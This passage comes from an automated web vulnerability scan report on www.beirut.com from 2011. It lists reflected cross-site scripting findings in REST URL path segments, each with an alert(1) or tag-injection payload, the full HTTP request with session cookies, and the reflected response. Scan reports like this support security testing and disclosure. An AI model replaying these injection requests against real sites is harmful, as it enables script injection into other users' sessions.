This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/2356909236ea0c'-alert(1)-'db07250d556/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:35:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/2356909236ea0c'-alert(1)-'db07250d556/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.909. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e59'-alert(1)-'fff20812f1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Storee8e59'-alert(1)-'fff20812f1d/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods/235690923/Pet-Storee8e59'-alert(1)-'fff20812f1d/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.910. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8924'-alert(1)-'7e34d20f629 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Store/71c8924'-alert(1)-'7e34d20f629 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Pet-Store/71c8924'-alert(1)-'7e34d20f629';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.911. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4ec"><a>153e7342d83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingbe4ec"><a>153e7342d83/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingbe4ec"><a>153e7342d83">
...[SNIP]...

4.912. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100e9'-alert(1)-'bd4c5fbe64f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping100e9'-alert(1)-'bd4c5fbe64f/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping100e9'-alert(1)-'bd4c5fbe64f/Consumer-Goods/235690923/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.913. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c282e<script>alert(1)</script>e64e32c93a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsc282e<script>alert(1)</script>e64e32c93a3/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsc282e<script>alert(1)</script>e64e32c93a3 <a href="#" id="backlink">
...[SNIP]...

4.914. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da910'-alert(1)-'dee1ecb246d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goodsda910'-alert(1)-'dee1ecb246d/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goodsda910'-alert(1)-'dee1ecb246d/235690923/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.915. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d05'-alert(1)-'50f46949a4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923e5d05'-alert(1)-'50f46949a4f/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:31:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923e5d05'-alert(1)-'50f46949a4f/Roastary/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.916. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f41b'-alert(1)-'fbbd96b6bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Roastary6f41b'-alert(1)-'fbbd96b6bee/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:36:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Roastary6f41b'-alert(1)-'fbbd96b6bee/78';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.917. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edc62'-alert(1)-'3a812d24093 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Roastary/78edc62'-alert(1)-'3a812d24093 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:39:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Roastary/78edc62'-alert(1)-'3a812d24093';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.918. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747fd'-alert(1)-'b7fca72191e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping747fd'-alert(1)-'b7fca72191e/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping747fd'-alert(1)-'b7fca72191e/Consumer-Goods/235690923/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.919. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602bc"><a>2563faf5cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping602bc"><a>2563faf5cdb/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping602bc"><a>2563faf5cdb">
...[SNIP]...

4.920. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3cde2<script>alert(1)</script>50f08ad7cec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods3cde2<script>alert(1)</script>50f08ad7cec/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods3cde2<script>alert(1)</script>50f08ad7cec <a href="#" id="backlink">
...[SNIP]...

4.921. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

